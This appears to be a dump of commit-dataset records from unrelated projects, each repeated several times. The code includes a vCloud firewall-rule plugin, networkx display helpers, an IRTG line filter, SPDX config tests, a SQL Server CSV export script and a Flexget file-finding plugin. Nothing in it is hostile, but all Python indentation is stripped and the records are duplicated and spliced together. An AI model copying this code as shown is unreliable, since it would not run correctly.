from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code merged in pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
<commit_before><commit_msg>Add new security group operation source code<commit_after>from cloudify import ctx
from cloudify import exceptions as cfy_exc
from cloudify.decorators import operation
from vcloud_plugin_common import with_vcd_client, wait_for_task
from network_operations import ProxyVCD
from network_plugin import check_ip, get_vm_ip
valid_protocols = ["Tcp", "Udp", "Icmp", "Any"]
CREATE_RULE = 1
DELETE_RULE = 2
@operation
@with_vcd_client
def create(vcd_client, **kwargs):
_rule_operation(CREATE_RULE, vcd_client)
@operation
@with_vcd_client
def delete(vcd_client, **kwargs):
_rule_operation(DELETE_RULE, vcd_client)
def _rule_operation(operation, vcd_client):
vcd_client = ProxyVCD(vcd_client) # TODO: remove when our code merged in pyvcloud
gateway = vcd_client.get_gateway(
ctx.node.properties['gateway'])
protocol = _check_protocol(ctx.node.properties['rule']['protocol'])
dest_port = str(ctx.node.properties['rule']['port'])
description = ctx.node.properties['rule']['description']
dest_ip = check_ip(get_vm_ip(vcd_client, ctx))
task = None
if operation == CREATE_RULE:
success, task = gateway.add_fw_rule(True, description, "allow", protocol, dest_port, dest_ip,
"Any", "External", False)
if not success:
raise cfy_exc.NonRecoverableError(
"Could not add firewall rule: {0}".format(description))
if operation == DELETE_RULE:
success, task = gateway.delete_fw_rule(protocol, dest_port, dest_ip,
"Any", "external")
if not success:
raise cfy_exc.NonRecoverableError(
"Could not delete firewall rule: {0}".format(description))
if task:
wait_for_task(vcd_client, task)
def _check_protocol(protocol):
protocol = protocol.capitalize()
if protocol not in valid_protocols:
raise cfy_exc.NonRecoverableError(
"Unknown protocol: {0}. Valid protocols are: {1}".format(protocol, valid_protocols))
return protocol
|
|
aacbfc7039456f66139b3d2f9789b0edbc36428d
|
neurokernel/tools/graph_utils.py
|
neurokernel/tools/graph_utils.py
|
#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
Add networkx graph display utilities.
|
Add networkx graph display utilities.
|
Python
|
bsd-3-clause
|
cerrno/neurokernel
|
Add networkx graph display utilities.
|
#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
<commit_before><commit_msg>Add networkx graph display utilities.<commit_after>
|
#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
Add networkx graph display utilities.#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
<commit_before><commit_msg>Add networkx graph display utilities.<commit_after>#!/usr/bin/env python
"""
Graph manipulation and visualization tools
"""
import tempfile
import os
import matplotlib.pyplot as plt
import networkx as nx
def imdisp(f):
"""
Display the specified image file using matplotlib.
"""
im = plt.imread(f)
plt.imshow(im)
plt.axis('off')
plt.draw()
return im
def show_pydot(g):
"""
Display a networkx graph using pydot.
"""
fd = tempfile.NamedTemporaryFile()
fd.close()
p = nx.to_pydot(g)
p.write_jpg(fd.name)
imdisp(fd.name)
os.remove(fd.name)
def show_pygraphviz(g, prog='dot', graph_attr={}, node_attr={}, edge_attr={}):
"""
Display a networkx graph using pygraphviz.
Parameters
----------
prog : str
Executable for generating the image.
graph_attr : dict
Global graph display attributes.
node_attr : dict
Global node display attributes.
edge_attr : dict
Global edge display attributes.
"""
fd = tempfile.NamedTemporaryFile(suffix='.jpg')
fd.close()
p = nx.to_agraph(g)
p.graph_attr.update(graph_attr)
p.node_attr.update(node_attr)
p.edge_attr.update(edge_attr)
p.draw(fd.name, prog=prog)
imdisp(fd.name)
os.remove(fd.name)
|
|
91fa4f5079f463b3a1f90e0c40daa8d5a529439a
|
exp/alto/tools/filter_lines.py
|
exp/alto/tools/filter_lines.py
|
#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals
|
Python
|
mit
|
kornai/4lang,kornai/4lang,kornai/4lang,kornai/4lang
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals
|
#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
<commit_before><commit_msg>Add script for filtering lines of IRTGs with multiple language preterms/terminals<commit_after>
|
#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
<commit_before><commit_msg>Add script for filtering lines of IRTGs with multiple language preterms/terminals<commit_after>#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
|
82ccee8813beea3fd2fb7a410ca341efc2133f07
|
tests/test_config.py
|
tests/test_config.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
Add tests for config.py functions and constants.
|
Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com>
|
Python
|
apache-2.0
|
spdx/tools-python
|
Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com>
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com><commit_after>
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com>from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com><commit_after>from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
|
cb6105f837c4d5ca3cd06306a7b978905e89cb40
|
scripts/export_db.py
|
scripts/export_db.py
|
#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
Add a script to export Flaure DB
|
Add a script to export Flaure DB
|
Python
|
agpl-3.0
|
ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide
|
Add a script to export Flaure DB
|
#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
<commit_before><commit_msg>Add a script to export Flaure DB<commit_after>
|
#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
Add a script to export Flaure DB#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
<commit_before><commit_msg>Add a script to export Flaure DB<commit_after>#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
|
14604c214b5117ad8fce4b92fd2bc911cb1a56b6
|
flexget/plugins/input_find.py
|
flexget/plugins/input_find.py
|
import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
# If mask was specified, turn it in to a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c
|
Python
|
mit
|
voriux/Flexget,spencerjanssen/Flexget,thalamus/Flexget,Pretagonist/Flexget,sean797/Flexget,qk4l/Flexget,Flexget/Flexget,thalamus/Flexget,jacobmetrick/Flexget,crawln45/Flexget,cvium/Flexget,jacobmetrick/Flexget,vfrc2/Flexget,Danfocus/Flexget,poulpito/Flexget,offbyone/Flexget,oxc/Flexget,LynxyssCZ/Flexget,grrr2/Flexget,v17al/Flexget,xfouloux/Flexget,antivirtel/Flexget,tarzasai/Flexget,tobinjt/Flexget,Danfocus/Flexget,qvazzler/Flexget,asm0dey/Flexget,ibrahimkarahan/Flexget,tsnoam/Flexget,jawilson/Flexget,qvazzler/Flexget,LynxyssCZ/Flexget,dsemi/Flexget,jawilson/Flexget,spencerjanssen/Flexget,OmgOhnoes/Flexget,v17al/Flexget,Danfocus/Flexget,tarzasai/Flexget,JorisDeRieck/Flexget,malkavi/Flexget,ratoaq2/Flexget,malkavi/Flexget,Danfocus/Flexget,dsemi/Flexget,vfrc2/Flexget,Pretagonist/Flexget,crawln45/Flexget,sean797/Flexget,tobinjt/Flexget,sean797/Flexget,malkavi/Flexget,offbyone/Flexget,gazpachoking/Flexget,OmgOhnoes/Flexget,grrr2/Flexget,asm0dey/Flexget,ianstalk/Flexget,spencerjanssen/Flexget,poulpito/Flexget,jawilson/Flexget,tsnoam/Flexget,ZefQ/Flexget,Flexget/Flexget,tsnoam/Flexget,gazpachoking/Flexget,crawln45/Flexget,ZefQ/Flexget,JorisDeRieck/Flexget,tvcsantos/Flexget,asm0dey/Flexget,patsissons/Flexget,Pretagonist/Flexget,qk4l/Flexget,drwyrm/Flexget,oxc/Flexget,jawilson/Flexget,jacobmetrick/Flexget,patsissons/Flexget,thalamus/Flexget,voriux/Flexget,cvium/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,ibrahimkarahan/Flexget,crawln45/Flexget,JorisDeRieck/Flexget,tobinjt/Flexget,malkavi/Flexget,ianstalk/Flexget,qvazzler/Flexget,drwyrm/Flexget,poulpito/Flexget,drwyrm/Flexget,Flexget/Flexget,grrr2/Flexget,X-dark/Flexget,tarzasai/Flexget,dsemi/Flexget,cvium/Flexget,vfrc2/Flexget,xfouloux/Flexget,LynxyssCZ/Flexget,ratoaq2/Flexget,ZefQ/Flexget,lildadou/Flexget,qk4l/Flexget,xfouloux/Flexget,antivirtel/Flexget,lildadou/Flexget,Flexget/Flexget,camon/Flexget,X-dark/Flexget,lildadou/Flexget,oxc/Flexget,camon/Flexget,patsissons/Flexget,OmgOhnoes/Flexget,ibrahimkarahan/Flexget,ianstalk/Flexget,ratoaq2/Flexget,v17al/Flexget,offbyone/Flexget,tvcsantos/Flexget,antivirtel/Flexget,tobinjt/Flexget,X-dark/Flexget
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c
|
import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
# If mask was specified, turn it in to a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
